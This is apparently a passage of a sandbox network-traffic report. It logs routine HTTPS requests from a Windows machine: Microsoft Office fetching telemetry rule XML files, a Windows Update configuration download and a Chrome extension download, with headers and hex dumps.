                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              12192.168.2.64973413.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:19 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 2030f408-901e-005b-5762-402005000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062219Z-174f7845968vqt9xhC1EWRgten0000000y600000000011cn
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              13192.168.2.64973920.109.210.53443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tg1leHE4ZP6u9fN&MD=YRHauRyX HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                              MS-CorrelationId: 08f02cc1-708e-41ac-8fad-ffb8f15e1edb
                                                                                                                                                                                                                                                                                              MS-RequestId: d9f61094-2fdb-4a2c-8e52-b405f7fb1963
                                                                                                                                                                                                                                                                                              MS-CV: dCxmW1zO70WV5ezV.0
                                                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:19 GMT
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              14192.168.2.64973313.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:21 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062221Z-174f7845968xr5c2hC1EWRd0hn0000000ezg000000001hfb
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              15192.168.2.64974213.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:21 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062221Z-174f7845968xr5c2hC1EWRd0hn0000000f0g0000000002vf
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              16192.168.2.64974413.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:21 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062221Z-174f78459688l8rvhC1EWRtzr00000000ar0000000001yvr
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              17192.168.2.64974313.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:21 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:21 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                              x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062221Z-174f7845968qj8jrhC1EWRh41s0000000xvg00000000hcfa
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              18192.168.2.649740172.217.19.2254437628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:22 UTC565OUTGET /crx/blobs/AW50ZFtGgmELRLriwzH8x-fivvIP_CI8UHr7kFM4v_6FKEmWDPCIvxRte3hajTr002h_TL1aNeI1j6ORlSqmkRZNQx_FmkF0M8cNhCaBi6LBPANpokiFTIWxmcbFALuXP2EAxlKa5X8GNoPhDGvusBS2ZbS0X4-z-ddz/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_11_1_1.crx HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              19192.168.2.64974813.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:23 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:23 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                              x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062223Z-174f7845968kvnqxhC1EWRmf3g0000000gyg000000000sxy
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              20192.168.2.64974913.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:24 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                              x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062224Z-174f7845968n2hr8hC1EWR9cag0000000xtg000000000ak1
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
